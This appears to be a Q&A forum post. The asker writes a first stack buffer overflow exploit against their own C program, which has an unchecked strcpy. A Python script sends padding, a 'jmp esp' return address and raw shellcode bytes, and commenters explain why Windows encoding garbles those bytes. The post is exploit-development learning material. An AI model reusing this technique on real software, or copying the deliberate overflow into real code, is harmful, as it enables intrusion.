# Sometimes some of my bytes disappear in my exploit. Why?

Tags: python, c, exploit, shellcode, ollydbg

I try write my own exploit. The idea is simple - overwrite return address to place where is opcode 'jmp esp'. In esp is address of my shellcode.

So I have this simple program:

```cpp
#include <stdio.h>
#include <string.h> 

void do_something(char *Buffer)
{
    char MyVar[100];
    strcpy(MyVar,Buffer);
}

int main (int argc, char **argv)
{
    do_something(argv[1]);
    return 0;
}
```

My exploit have been written in python. Code: (I think that my shellcode not work, but it is not important now)

```py
import os
import subprocess

out = '\x48' * 112
out = out + <address of 'jmp esp' opcode>
out = out + '\xcc\xC9\x64\x8B\x71\x30\x8B\x76\x0C\x8B\x76\x1C\x8B\x36\x8B\x06\x8B\x68  \x08\xEB\x20\x5B\x53\x55\x5B\x81\xEB\x11\x11\x11\x11\x81\xC3\xDA\x3F\x1A\x11\xFF\xD3\x81\xC3\x11\x11\x11\x11\x81\xEB\x8C\xCC\x18\x11\xFF\xD3\xE8\xDB\xFF\xFF\xFF\x63\x6d\x64'

subprocess.call(['SimpleExploit.exe', out])
```

If address of 'jmp esp' opcode I have set for `0x41414141`: (AAAA)
everything is ok (of course `0x41414141` is not good address, but I can see that memory has been overwritten)

[image: ollydbg output]

My problem starts if I put correctly address. I found `0x7769E24D`, so I used this value and after that in ollydbg I seen:

[image: ollydbg output2]

And this is my question: **Why memory looks different?** It looks like that one line has been removed. But why? Interesting thing is that If I change only one byte (`0x77` to `0x41`), memory is overwrite with correct value.

[image: ollydbg output3]

The second problem is that some of my bytes are transform to different values - for example `0x8b` to `0x3f`.

Could somebody tell me why this happen? Maybe this is a kind of protection? It is something with my operation system? I use Windows 8.1 x64.

Comment: It looks like a character encoding problem. 0x3F is ASCII for `?`, that is the substitution character when some character cannot be properly encoded. And `0x8B`, depending on the encoding, may not be a character at all (it is not in Latin1)! My advice would be to write your exploit in C, too. Python does too many clever things with the characters, particularly in Windows.

Comment: you **might** get better results in your python code using a bytearray rather than a string. https://docs.python.org/2/library/functions.html#bytearray

Comment: You can't pass arbitrary unescaped characters as a command-line argument (here to SimpleExploit.exe).